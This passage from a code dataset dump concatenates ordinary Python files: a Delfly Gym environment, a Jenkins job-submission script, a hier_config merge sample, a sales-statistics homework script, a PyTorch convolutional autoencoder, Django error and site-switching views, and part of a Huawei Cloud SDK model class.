crude(FCall)\n # print(BS.callSquared(K)-BS.exactCallPrice(K)**2)\n # print(BS.callSquared(K, theta)-BS.exactCallPrice(K)**2)\n # optth = optimize.brentq(lambda th: BS.callSquaredDeriv(K, th), -5, 5)\n # print('optimal theta = ', optth)\n # testExactVar()\n # testCallSquaredDeriv()\n # testVarEquiv()\n\n # plotCallPutPrices()\n\n # plotCallPutVar()\n # plotISVar()\n # plotOptimalTheta()\n\n # plot3DISVars()\n # plotVarRM()\n # translation()\n # MC()\n # plotISCall()\n\n # plt.show()\n\n # theta = np.linspace(-10000, 10000)\n # # y = [sqrt(integrate.quad(lambda x: RMp(theta, x)**2, log(K), np.infty)[0]) for theta in theta]\n # # y = [sqrt(mp.quad(lambda x: RMp(theta, x)**2, [log(K), mp.inf])) for theta in theta]\n # y = [log(sqrt(mp.quad(lambda x: RMput(theta, x)**2, [-mp.inf, mp.inf]))) for theta in theta]\n # print(y)\n # # y = [sqrt(mp.quad(lambda x: Hexpl(theta, x)**2, [log(K), mp.inf])) for theta in theta]\n # plt.plot(theta, y)\n # plt.show()\n\n # mp.plot(lambda theta: sqrt(mp.quad(lambda x: H(theta, x)**2, [log(K), mp.inf])), [100, 1000000000])\n # mp.plot(lambda theta: sqrt(mp.quad(lambda x: H(theta, x)**2, [log(K), mp.inf])), [100, 1000000000])\n\n # pf = []\n # # for th in [0, 100, 10000, 1000000, 100000000]:\n # x = np.linspace(-5, 5)\n # for th in [0, 1, 2, 10]:\n # pf.append(lambda x: H(th, x))\n # print(pf[-1](0))\n # y = [H(th, x)**2 for x in x]\n # plt.plot(x, y, label=str(th))\n\n # plt.legend()\n # plt.show()\n # mp.plot(pf, [-5,5])\n\n # mp.plot(lambda theta: sqrt(mp.quad(lambda x: Hexpl(theta, x)**2, [log(K), mp.inf])), [100, 1000000000])\n # mp.plot(lambda theta: log(sqrt(mp.quad(lambda x: Hexpl(theta, x)**2, [log(K), mp.inf]))), [100, 1000000000])\n\nif __name__ == '__main__':\n main()\n","sub_path":"normal.py","file_name":"normal.py","file_ext":"py","file_size_in_byte":13890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21611161","text":"import numpy as np\nimport gym\nfrom gym import spaces\nfrom datetime import datetime\n\nfrom time import sleep\nfrom fcntl import fcntl, F_GETFL, F_SETFL\nfrom os import O_NONBLOCK\nimport Queue\nimport threading\nimport subprocess\n\nclass Simulation():\n \n def __init__(self):\n self.p = None\n \n def start(self, x, y, psi):\n # TODO send initial settings to simulation\n self.p = subprocess.Popen(\"../EvolutionaryLearning/EL\", stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT,\n shell=False, universal_newlines=True, close_fds=True)\n # set the 
O_NONBLOCK flag of p.stdout file descriptor:\n flags = fcntl(self.p.stdout, F_GETFL) # get current p.stdout flags\n fcntl(self.p.stdout, F_SETFL, flags | O_NONBLOCK)\n \n def end(self):\n if self.p is not None and self.p.poll() is None:\n self.p.stdout.flush()\n self.p.stdin.flush()\n self.p.kill()\n self.p.wait()\n\n def write_action(self, action):\n try:\n self.p.stdin.write(str(action) + \"\\n\")\n self.p.stdin.flush()\n except IOError:\n return\n \n def read_state(self):\n result = None\n errors = 0\n while result is None:\n try:\n result = self.p.stdout.readline().strip()\n #except OSError:\n # the os throws an exception if there is no data\n # print '[No more data]'\n except IOError:\n errors += 1\n # print 'not ready'\n if errors > 4:\n self.end()\n sleep(0.1)\n self.start(2,2,0)\n errors = 0\n \n sleep(0.05)\n \n result = np.array([float(i) for i in result.split()])\n return result\n\nclass DelflyEnv(gym.Env):\n metadata = {\n 'render.modes' : ['human', 'rgb_array'],\n 'video.frames_per_second' : 25\n }\n \n def __init__(self):\n \n self.viewer = None\n \n self.max_angle = 2*0.523809524 # 30 deg\n self.action_low = np.array([-self.max_angle, 0.04])\n self.action_high = np.array([self.max_angle, 5])\n self.action_space = spaces.Box(low=self.action_low, high=self.action_high) # angle offset to track\n \n #action_low = -self.max_angle\n #action_high = self.max_angle\n #self.action_space = spaces.Box(low=action_low, high=action_high, shape=(1,)) # angle offset to track\n \n _low = np.array([0,0,0,0,0,0,0,0,0,0,-3.142857143]) # apple detector location, apple detector size, average disparity\n _high = np.array([16,16,16,16,16,16,16,16,16,16,3.142857143])\n self.observation_space = spaces.Box(low = _low, high = _high)\n\n self.observation = np.array([0,0,0,0,0,0,0,0,0,0,0])\n self.state = None\n\n self._seed()\n self._reset()\n self.done = True\n \n self.sim = Simulation()\n \n self.poles = np.array([])\n \n #return observation, reward, done, info\n \n def _step(self, action):\n if self.done is True:\n self.sim.end()\n # reinitialise simulation with new initial conditions\n self.sim.start(2,2,0)\n self.done = False\n self.poles = self.sim.read_state()\n \n # run sim step\n orig_action = action\n action = np.clip(action, self.action_low, self.action_high)\n\n for a in action:\n self.sim.write_action(a)\n \n # read observations\n self.state = self.sim.read_state()\n \n if self.state.size == 0 or self.state[11] >= 0 or self.state[11] < -10:\n self.done = True\n\n if self.state.size >= 12:\n self.observation = self.state[0:11]\n self.reward = self.state[11] # -distance to goal in dm\n #print self.reward, (abs(orig_action[0]) > self.max_angle), 0.1/(abs(orig_action[1]+0.1))\n self.reward = self.reward - (abs(orig_action[0]) > self.max_angle) - 0.1/(abs(orig_action[1]+0.1)) # penalize large actions\n #print self.reward\n \n return self.observation, self.reward, self.done, {}\n \n def _reset(self):\n return self.observation\n \n def _render(self, mode='human', close=False):\n if close:\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n return\n\n screen_width = 600\n screen_height = 600\n\n world_width = 8\n scale = screen_width/world_width\n \n appleWidth = 0.5*scale\n \n delflyWidth = 0.3*scale\n delflyHeight = 0.3*scale\n \n polewidth = 5.0\n polelen = 30.0\n\n if self.viewer is None:\n from gym.envs.classic_control import rendering\n self.viewer = rendering.Viewer(screen_width, screen_height)\n \n # add Delfly\n l,r,t,b = -delflyWidth/2, delflyWidth/2, delflyHeight/2, 
-delflyHeight/2\n delfly = rendering.FilledPolygon([(l,b), (0,t), (0,t), (r,b)]) # triangle\n self.delflyTrans = rendering.Transform()\n delfly.add_attr(self.delflyTrans)\n self.viewer.add_geom(delfly)\n \n lof = rendering.Line(start=(0.0, 0.0), end=(5*delflyWidth*0.5, 5*delflyWidth*0.866)) # line of sight\n lof.add_attr(self.delflyTrans)\n self.viewer.add_geom(lof)\n \n lof = rendering.Line(start=(0.0, 0.0), end=(-5*delflyWidth*0.5, 5*delflyWidth*0.866)) # line of sight\n lof.add_attr(self.delflyTrans)\n self.viewer.add_geom(lof)\n \n l,r,t,b = -polewidth/2,polewidth/2,polelen-polewidth/2,-polewidth/2\n set_point = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])\n set_point.set_color(.8,.6,.4)\n self.set_pointtrans = rendering.Transform(translation=(0, 0))\n set_point.add_attr(self.set_pointtrans)\n self.viewer.add_geom(set_point)\n \n self.poleTrans = []\n\n if self.state is None: return None\n \n if self.poles.size > 0:\n if len(self.poleTrans) is not self.poles.size / 2:\n self.poleTrans = []\n for i in range(0,self.poles.size/2):\n pole = rendering.make_circle(appleWidth/2)\n pole.set_color(.5,.5,.8)\n self.poleTrans.append(rendering.Transform(translation=(0,0)))\n pole.add_attr(self.poleTrans[i])\n self.viewer.add_geom(pole)\n # add poles\n for i in range(0,self.poles.size/2):\n self.poleTrans[i].set_translation(self.poles[i*2]*scale, self.poles[i*2 + 1]*scale)\n self.poles = np.array([])\n return None\n\n if self.state.size < 14: return None\n\n x = self.state\n self.delflyTrans.set_translation(x[12]*scale, x[13]*scale)\n self.delflyTrans.set_rotation(x[10]-1.571428571)\n \n self.set_pointtrans.set_translation(x[12]*scale, x[13]*scale)\n self.set_pointtrans.set_rotation(x[14]-1.571428571)\n\n return self.viewer.render(return_rgb_array = mode=='rgb_array')\n","sub_path":"gym/envs/local/delfly_pole.py","file_name":"delfly_pole.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"496108454","text":"#!/usr/bin/env python\n# Author: Nhat Ngo (2017)\n# Nifty python program to submit job directly to Jenkins\n# \n# PREREQUISITE:\n# pip install tenacity\n# export JENKINS_USERNAME=\n# export JENKINS_TOKEN=\n\nimport os\nimport sys\nimport json\nimport tenacity\nimport argparse\nimport requests\n\nimport pprint\nfrom textwrap import dedent\n\n\ndef cli():\n \"\"\"Parse the CLI arguments\"\"\"\n \n cli_usage = \"\"\" Create tempest compute host check on Nectar Jenkins.\n PREREQUISITE:\n export JENKINS_USERNAME=\n export JENKINS_TOKEN=\n \"\"\"\n cloud_usage = \"\"\" Cloud to run tempest on: production, testing, development.\n Default to production.\"\"\"\n az_usage = \"\"\" Zone to run the the test on. See:\n https://wiki.rc.nectar.org.au/wiki/Tempest#AVAILABILITY_ZONES\n \"\"\"\n hosts_usage = \"\"\" Nova hosts to test. You can add multiple hosts. 
Eg: -s qh2-rcc10 -s qh2-rcc11\n                    Host must be in AVAILABILITY_ZONE; if not nova will return a 'No Valid Host' error.\n                    Leave blank to let scheduler choose a host.\n                    \"\"\"\n    wait_usage = \"\"\" Do not wait for job to start, return the queue url immediately.\"\"\"\n    debug_usage = \"\"\" Debug mode.\"\"\"\n\n    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,\n                                     description=cli_usage)\n    parser.add_argument(\"AVAILABILITY_ZONE\", type=str, action=\"store\",\n                        help=dedent(az_usage))\n    parser.add_argument(\"--host\", \"-s\", type=str, action=\"append\",\n                        help=dedent(hosts_usage))\n    parser.add_argument(\"--cloud\", \"-c\", type=str, action=\"store\", default=None,\n                        help=dedent(cloud_usage))\n    parser.add_argument(\"--nowait\", action=\"store_true\",\n                        help=dedent(wait_usage))\n    parser.add_argument(\"--debug\", action=\"store_true\",\n                        help=dedent(debug_usage))\n    return parser.parse_args()\n\n\ndef get_auth():\n    \"\"\"Return the basic HTTP auth pair needed for requests\"\"\"\n    username = os.environ.get('JENKINS_USERNAME')\n    token = os.environ.get('JENKINS_TOKEN')\n\n    if username is None or token is None:\n        err_msg = \"\"\" JENKINS_USERNAME/TOKEN not found. Have you set your environment?\n        export JENKINS_USERNAME=\n        export JENKINS_TOKEN=\n        \"\"\"\n        raise EnvironmentError(dedent(err_msg))\n\n    if DEBUG:\n        sys.stdout.write(\"Login as: %s:%s\\n\" % (username, token))\n        sys.stdout.flush()\n    return (username, token)\n\n\ndef compute_host_check_build(az, host=None, cloud=None):\n    \"\"\"Trigger a Jenkins compute-host-check build with the given parameters\"\"\"\n    # requests.utils.quote escapes the string for URL encoding\n    params = [\"AVAILABILITY_ZONE=%s\" % requests.utils.quote(az)]\n    if host is not None:\n        params.append(\"HOST=%s\" % requests.utils.quote(host))\n    if cloud is not None:\n        params.append(\"CLOUD=%s\" % requests.utils.quote(cloud))\n    \n    url = \"%s/buildWithParameters?%s\" % (JURL, \"&\".join(params))\n    \n    if DEBUG:\n        sys.stdout.write(\"POST to: %s\\n\" % url)\n        sys.stdout.flush()\n\n    # Submit the job and get the corresponding Jenkins queue URL from the headers\n    return requests.post(url, auth=AUTH)\n\n\ndef get_queue_json(build_response):\n    \"\"\"Return the queue JSON\"\"\"\n    queue_url = \"%sapi/json\" % build_response.headers[\"Location\"]\n    queue_response = requests.get(queue_url, auth=AUTH)\n    return queue_response.json()\n\ndef compute_host_check_submitted(build_response):\n    \"\"\"Print a confirmation for the submitted Jenkins job.\"\"\"\n    response = get_queue_json(build_response)\n    queue_url = \"%sapi/json\" % build_response.headers[\"Location\"]\n    \n    if DEBUG:\n        sys.stdout.write(\"Queue response:=======================\\n\")\n        pp.pprint(response)\n        sys.stdout.write(\"======================================\\n\")\n        sys.stdout.flush()\n\n    # Get and format the submitted parameters\n    params = response[u\"params\"][response[u\"params\"].find(\"AVAILABILITY\"):]\n    params = \" \".join(param.split(\"=\")[1] for param in params.split(\"\\n\"))\n    result = \"%s submitted: %s\\n\" % (params, queue_url)\n    \n    sys.stdout.write(result)\n\n
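# With wait_exponential(multiplier=1, max=15), tenacity sleeps roughly\n# 1, 2, 4, 8, 15, 15, ... seconds between attempts, while stop_after_delay(600)\n# abandons the retry loop after ten minutes in total -- which is what the\n# docstring below promises.\n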
class QueuingException(Exception):\n    \"\"\"Raised when a queued build does not start within the waiting window.\"\"\"\n\n\n@tenacity.retry(wait=tenacity.wait_exponential(multiplier=1, max=15),\n                stop=tenacity.stop_after_delay(600))\ndef compute_host_check_wait(build_response):\n    \"\"\"\n    Wait for the build to start and print the job URL. Stop after 10 minutes.\n    Retry exponentially from 1 second up to 15 seconds, then every 15 seconds afterward.\n    \"\"\"\n    response = get_queue_json(build_response)\n\n    if u\"Queue$LeftItem\" not in response[u\"_class\"]:\n        err_msg = \"\"\" Waiting timeout after 600 seconds.\n        Jenkins is very busy, please check API later.\n        \"\"\"\n        raise QueuingException(dedent(err_msg))\n    \n    if DEBUG:\n        sys.stdout.write(\"Success response:=======================\\n\")\n        pp.pprint(response)\n        sys.stdout.write(\"========================================\\n\")\n        sys.stdout.flush()\n\n    job_url = response[u\"executable\"][u\"url\"]\n\n    # Get and format the submitted parameters\n    params = response[u\"params\"][response[u\"params\"].find(\"AVAILABILITY\"):]\n    params = \" \".join(param.split(\"=\")[1] for param in params.split(\"\\n\"))\n    \n    # Result\n    result = \"%s started: %s\\n\" % (params, job_url)\n    \n    sys.stdout.write(result)\n\nif __name__ == \"__main__\":\n    \n    args = cli()\n\n    # Set global variables\n    global DEBUG\n    DEBUG = args.debug\n    if DEBUG:\n        global pp\n        pp = pprint.PrettyPrinter(indent=2)\n\n    global AUTH\n    AUTH = get_auth()\n    global JURL\n    JURL = \"https://jenkins.rc.nectar.org.au/job/tempest-compute-host-check\"\n\n    CLOUD = args.cloud\n    HOSTS = args.host or [None]\t# no --host given: let the scheduler choose a host\n    AVAILABILITY_ZONE = args.AVAILABILITY_ZONE\n    WAIT = not args.nowait\n\n    responses = [compute_host_check_build(AVAILABILITY_ZONE,\n                                          host=HOST,\n                                          cloud=CLOUD)\n                 for HOST in HOSTS]\n    \n    for resp in responses:\n        if WAIT:\n            try:\n                compute_host_check_wait(resp)\n            except QueuingException as ex:\n                sys.stdout.write(\"Queue error: %s\\n\" % ex)\n                sys.stdout.flush()\n                compute_host_check_submitted(resp)\n        else:\n            compute_host_check_submitted(resp)","sub_path":"tempest_compute_check.py","file_name":"tempest_compute_check.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621138787","text":"from hier_config import HConfig\nfrom hier_config.host import Host\nimport yaml\n\noptions = yaml.safe_load(open('./tests/files/test_options_ios.yml'))\nhost = Host('brborder1', 'ios', options)\n\n# Build HConfig object for the Running Config\n\nrunning_config_hier = HConfig(host=host)\nrunning_config_hier.load_from_file('./tests/files/brborder1_shrun.log')\n\n# Build Hierarchical Configuration object for the Compiled Config\n\ncompiled_config_hier = HConfig(host=host)\ncompiled_config_hier.load_from_file('./tests/files/brborder1_add.log')\n\n# Merge additional(compiled) config to running config\n\nfor child in compiled_config_hier.children:\n#    print(child)\n    if str(child).startswith('no '):\n        # remove the literal 'no ' prefix (str.lstrip('no ') strips characters,\n        # not a prefix, and would eat leading 'n'/'o' letters of the command)\n        child_str = str(child)[len('no '):]\n#        print(child_str)\n        running_config_hier.del_child_by_text(child_str)\n    else:\n        running_config_hier.add_deep_copy_del_of(child, merged=True)\n\nfor line in running_config_hier.all_children():\n    print(line.cisco_style_text())\n","sub_path":"hier_config_sample.py","file_name":"hier_config_sample.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407788711","text":"''' VARIANT 1\nWe write five functions, one per statistic, computed for every customer.\n\nEach function takes a dict whose keys are customer names and whose values are lists of purchase amounts.\nEvery function returns a dict over all customers with the corresponding value of one of the statistics:\n1. number of purchases;\n2. average purchase amount;\n3. maximum purchase amount;\n4. minimum purchase amount;\n5. total amount of all purchases.\n'''\n\n
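\n# Input/output shape, illustrated with made-up data:\n#   n_sale({'Ann': [10, 20]})     -> {'Ann': 2}\n#   middle_sum({'Ann': [10, 20]}) -> {'Ann': 15.0}\n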
# Counts the number of purchases\ndef n_sale(name):\n    s = dict()\n    for k in name:\n        s[k] = len(name[k])\n    return s\n\n\n# Computes the average purchase amount\ndef middle_sum(name):\n    s = dict()\n    for i in name:\n        summ = 0\n        for j in range(len(name[i])):\n            summ += name[i][j]\n        s[i] = float('{:.2f}'.format(summ/len(name[i])))\n    return s\n\n\n# Finds the maximum purchase amount\ndef max_sale(name):\n    s = dict()\n    for i in name:\n        s[i] = max(name[i])\n    return s\n\n\n# Finds the minimum purchase amount\ndef min_sale(name):\n    s = dict()\n    for i in name:\n        s[i] = min(name[i])\n    return s\n\n\n# Computes the total amount of all purchases\ndef sum_m(name):\n    s = dict()\n    for i in name:\n        summ = 0\n        for j in range(len(name[i])):\n            summ += name[i][j]\n        s[i] = summ\n    return s\n\n\nsale = {'Алла': [100, 22, 63, 152, 415, 78, 459, 958, 10, 63],\n        'Борис': [122, 52, 36, 256, 398, 45, 145, 147, 15],\n        'Валентин': [54, 45, 789, 369, 52, 14, 16, 35, 14, 747, 95, 8],\n        'Галина': [56, 25, 96, 357, 496, 1258, 12, 45, 65, 36, 45],\n        'Дмитрий': [145, 85, 85, 96, 45, 75, 36, 45, 75, 45, 85, 58],\n        'Дианна': [152, 875, 5, 0.96, 455, 15, 6, 75, 7, 96, 54, 123]}\n\n# Print the result as a table (customer names are kept as in the source data)\nprint('Customer    Number of    Purchase amount')\nprint('name       ', ' purchases ', ' Average    ', ' Maximum    ', 'Minimum     ', 'Total')\nprint('{:_^72}'.format(' VARIANT 1: five functions '))\nfor i in sale:\n    print('{:<11}'.format(i), '{:<12}'.format(n_sale(sale)[i]), '{:<12}'.format(middle_sum(sale)[i]),\n          '{:<12}'.format(max_sale(sale)[i]), '{:<12}'.format(min_sale(sale)[i]), '{:<12}'.format(sum_m(sale)[i]))\n\n
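\n# A minimal self-check of the five helpers above on a tiny hypothetical\n# customer; the name and the amounts are illustrative only.\n_demo = {'Test': [100, 200]}\nassert n_sale(_demo) == {'Test': 2}\nassert middle_sum(_demo) == {'Test': 150.0}\nassert max_sale(_demo) == {'Test': 200}\nassert min_sale(_demo) == {'Test': 100}\nassert sum_m(_demo) == {'Test': 300}\n\n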
''' VARIANT 2\nNow a single function, sale_info(name), computes all of the following per customer:\n1. number of purchases;\n2. average purchase amount;\n3. maximum purchase amount;\n4. minimum purchase amount;\n5. total amount of all purchases.\n\nThe function takes a dict whose keys are customer names and whose values are lists of purchase amounts.\nIt returns a dict mapping each customer name to the list of the corresponding statistics.\n'''\n\n\ndef sale_info(name):\n    s = dict()\n    for i in name:\n        summ = 0\n        for j in range(len(name[i])):\n            summ += name[i][j]\n        s[i] = [len(name[i]), float('{:.2f}'.format(summ/len(name[i]))), max(name[i]), min(name[i]), summ]\n    return s\n\n\nprint('{:_^72}'.format(' VARIANT 2: a single function '))\nfor i in sale:\n    print('{:<11}'.format(i), end=' ')\n    for j in range(len(sale_info(sale)[i])):\n        print('{:<12}'.format(sale_info(sale)[i][j]), end=' ')\n    print()","sub_path":"DZ_0507_sale.py","file_name":"DZ_0507_sale.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244728223","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.nn.parameter import Parameter\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torchvision.utils import make_grid\nimport matplotlib.ticker as ticker\n\n# download data\nbatch_size = 128\nimage_size = 64\n\ndataset = dset.CIFAR10(root='../../data/', download=True, train=True,\n                       transform=transforms.Compose([transforms.Resize(image_size),\n                                                     transforms.ToTensor()]))\n# batch the dataset; train() below iterates over this dataloader\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True)\n# check device is cuda\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# show image\ndef show(img):\n    npimg = img.numpy()\n    ax = plt.gca()\n    ax.grid(False)\n    plt.imshow(np.transpose(npimg, (1,2,0)), interpolation='nearest')\n    plt.axis('off')\n\n# define model\nclass ConvAutoEncoder(nn.Module):\n    \n    def __init__(self):\n        \n        super(ConvAutoEncoder, self).__init__()\n        self.encoder = nn.Sequential(\n            nn.Conv2d(3, 512, 4, 2, 0, bias=False), \n            nn.BatchNorm2d(512),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.Conv2d(512, 128, 4, 2, 1, bias=False),\n            nn.BatchNorm2d(128),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.Conv2d(128, 32, 4, 2, 1, bias=False),\n            nn.BatchNorm2d(32),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.Conv2d(32, 8, 4, 2, 1, bias=False),\n            nn.Sigmoid()\n        )\n        \n        self.decoder = nn.Sequential(\n            nn.ConvTranspose2d(8, 32, 4, 2, 0, bias=False), \n            nn.BatchNorm2d(32),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.ConvTranspose2d(32, 128, 4, 2, 1, bias=False),\n            nn.BatchNorm2d(128),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.ConvTranspose2d(128, 512, 4, 2, 1, bias=False),\n            nn.BatchNorm2d(512),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.ConvTranspose2d(512, 3, 4, 2, 1, bias=False),\n            nn.Sigmoid()\n        )\n        \n    def forward(self, input):\n        encoded = self.encoder(input)\n        output = self.decoder(encoded)\n        return output\n    \n# define training method\ndef train(model, optimiser, criterion, epochs):\n    losses = []\n    for epoch in range(epochs):\n        for idx, (data, label) in enumerate(dataloader):\n            model.zero_grad()\n            x = data.to(device)\n            output = model(x)\n            loss = criterion(output, x)\n            losses.append(loss.item())\t# store a plain float, not the graph-holding tensor\n            loss.backward()\n            optimiser.step()\n        print('Done: [%d/%d][%d/%d] Loss: %.4f ' % (epoch, epochs, idx, len(dataloader), loss.item()))\n    return losses\n\n# define autoencoder\ncae = ConvAutoEncoder().to(device)\n\n# define optim and criterion\noptimizer = torch.optim.Adam(cae.parameters(), lr = 0.001, weight_decay=1e-5)\ncriterion = nn.MSELoss()\n\n# train \nlosses = train(cae, optimizer, criterion, 15)\n\n# plot
losses\nplt.figure()\nplt.plot(losses)\n \n","sub_path":"conv_ae.py","file_name":"conv_ae.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96560695","text":"import sys\n\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.contrib.sites.models import Site\nfrom django.http import Http404\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils.http import url_has_allowed_host_and_scheme\nfrom sfdo_template_helpers.oauth2.salesforce.views import SalesforcePermissionsError\n\nfrom config.settings.base import IP_RESTRICTED_MESSAGE\n\nGENERIC_ERROR_MSG = \"An internal error occurred while processing your request.\"\n\n\ndef custom_permission_denied_view(request, exception):\n message = GENERIC_ERROR_MSG\n if isinstance(exception, SalesforcePermissionsError):\n message = str(exception)\n\n return render(\n request,\n \"index.html\",\n context={\"JS_CONTEXT\": {\"error_message\": message}},\n status=403,\n )\n\n\ndef custom_500_view(request):\n message = GENERIC_ERROR_MSG\n value = sys.exc_info()[1]\n\n if \"ip restricted\" in value.args[0]:\n message = IP_RESTRICTED_MESSAGE\n\n return render(\n request,\n \"index.html\",\n context={\"JS_CONTEXT\": {\"error_message\": message}},\n status=500,\n )\n\n\n@user_passes_test(lambda user: user.is_superuser, login_url=reverse_lazy(\"admin:login\"))\ndef set_site(request):\n \"\"\"\n Put the selected `site_id` into the session. The ID is then used in favor of the\n current request's domain in `CurrentSiteMiddleware`.\n \"\"\"\n next_url = request.GET.get(\"next\", \"\")\n try:\n site = Site.objects.get(pk=request.GET.get(\"site_id\"))\n except (Site.DoesNotExist, ValueError):\n raise Http404(\"Couldn't find a matching site\")\n request.session[\"site_id\"] = site.id\n\n # Ensure the URL is safe\n if not url_has_allowed_host_and_scheme(next_url, settings.ALLOWED_HOSTS):\n next_url = reverse(\"admin:index\")\n\n # Don't redirect to a change view for an object that won't exist on the selected\n # site - go to its list view instead\n if next_url.endswith(\"/change/\"):\n # Remove the ID, \"/change/\" suffix, and trailing slash\n parts = next_url.split(\"/\")[:-3]\n next_url = \"/\".join(parts) + \"/\"\n\n return redirect(next_url)\n","sub_path":"metadeploy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351146566","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass ScaleScript:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'name': 'str',\n 'uri': 'str',\n 'parameters': 'str',\n 'nodes': 'list[str]',\n 'active_master': 'bool',\n 'fail_action': 'str',\n 'action_stage': 'str'\n }\n\n attribute_map = {\n 'name': 'name',\n 'uri': 'uri',\n 'parameters': 'parameters',\n 'nodes': 'nodes',\n 'active_master': 'active_master',\n 'fail_action': 'fail_action',\n 'action_stage': 'action_stage'\n }\n\n def __init__(self, name=None, uri=None, parameters=None, nodes=None, active_master=None, fail_action=None, action_stage=None):\n \"\"\"ScaleScript\n\n The 
model defined in huaweicloud sdk\n\n        :param name: Name of the custom auto-scaling automation script. Script names must be unique within a cluster. Only digits, letters, spaces, hyphens and underscores are allowed, the name must not start with a space, and it must be 1 to 64 characters long.\n        :type name: str\n        :param uri: Path of the custom automation script: an OBS bucket path or a local VM path. - OBS bucket path: enter the script path directly, e.g. obs://XXX/scale.sh - Local VM path: enter a valid script path; the path must start with '/' and end with .sh.\n        :type uri: str\n        :param parameters: Parameters of the custom automation script, separated by spaces. The following predefined system parameters can be passed in: - ${mrs_scale_node_num}: number of nodes being added or removed - ${mrs_scale_type}: scaling type, scale_out for expansion and scale_in for shrinking - ${mrs_scale_node_hostnames}: hostnames of the nodes being scaled - ${mrs_scale_node_ips}: IP addresses of the nodes being scaled - ${mrs_scale_rule_name}: name of the rule that triggered the scaling Other user-defined parameters are used the same way as in an ordinary shell script, separated by spaces.\n        :type parameters: str\n        :param nodes: Names of the node groups on which the custom automation script runs.\n        :type nodes: list[str]\n        :param active_master: Whether the custom automation script runs only on the active Master node. Defaults to false, meaning the script may run on all Master nodes.\n        :type active_master: bool\n        :param fail_action: Whether to continue executing subsequent scripts and creating the cluster after the custom automation script fails to execute. Notes: - Setting this to 'continue' is recommended while debugging, so that the cluster continues to install and start regardless of whether the script succeeds. - Because a successful scale-in cannot be rolled back, fail_action must be set to 'continue' for scripts executed after a scale-in. Enum values: - continue: continue executing subsequent scripts. - errorout: abort the operation.\n        :type fail_action: str\n        :param action_stage: When the script runs. Enum values: - before_scale_out: before scale-out - before_scale_in: before scale-in - after_scale_out: after scale-out - after_scale_in: after scale-in\n        :type action_stage: str\n        \"\"\"\n        \n        \n\n        self._name = None\n        self._uri = None\n        self._parameters = None\n        self._nodes = None\n        self._active_master = None\n        self._fail_action = None\n        self._action_stage = None\n        self.discriminator = None\n\n        self.name = name\n        self.uri = uri\n        if parameters is not None:\n            self.parameters = parameters\n        self.nodes = nodes\n        if active_master is not None:\n            self.active_master = active_master\n        self.fail_action = fail_action\n        self.action_stage = action_stage\n\n    @property\n    def name(self):\n        \"\"\"Gets the name of this ScaleScript.\n\n        Name of the custom auto-scaling automation script. Script names must be unique within a cluster. Only digits, letters, spaces, hyphens and underscores are allowed, the name must not start with a space, and it must be 1 to 64 characters long.\n\n        :return: The name of this ScaleScript.\n        :rtype: str\n        \"\"\"\n        return self._name\n\n    @name.setter\n    def name(self, name):\n        \"\"\"Sets the name of this ScaleScript.\n\n        Name of the custom auto-scaling automation script. Script names must be unique within a cluster. Only digits, letters, spaces, hyphens and underscores are allowed, the name must not start with a space, and it must be 1 to 64 characters long.\n\n        :param name: The name of this ScaleScript.\n        :type name: str\n        \"\"\"\n        self._name = name\n\n    @property\n    def uri(self):\n        \"\"\"Gets the uri of this ScaleScript.\n\n        Path of the custom automation script: an OBS bucket path or a local VM path. - OBS bucket path: enter the script path directly, e.g. obs://XXX/scale.sh - Local VM path: enter a valid script path; the path must start with '/' and end with .sh.\n\n        :return: The uri of this ScaleScript.\n        :rtype: str\n        \"\"\"\n        return self._uri\n\n    @uri.setter\n    def uri(self, uri):\n        \"\"\"Sets the uri of this ScaleScript.\n\n        Path of the custom automation script: an OBS bucket path or a local VM path. - OBS bucket path: enter the script path directly, e.g. obs://XXX/scale.sh - Local VM path: enter a valid script path; the path must start with '/' and end with .sh.\n\n        :param uri: The uri of this ScaleScript.\n        :type uri: str\n        \"\"\"\n        self._uri = uri\n
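\n    # Typical construction; every literal below is illustrative only, not taken\n    # from the SDK docs:\n    #   ScaleScript(name='scale-out-hook', uri='obs://bucket/scale.sh',\n    #               nodes=['node_group_1'], fail_action='continue',\n    #               action_stage='after_scale_out')\n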
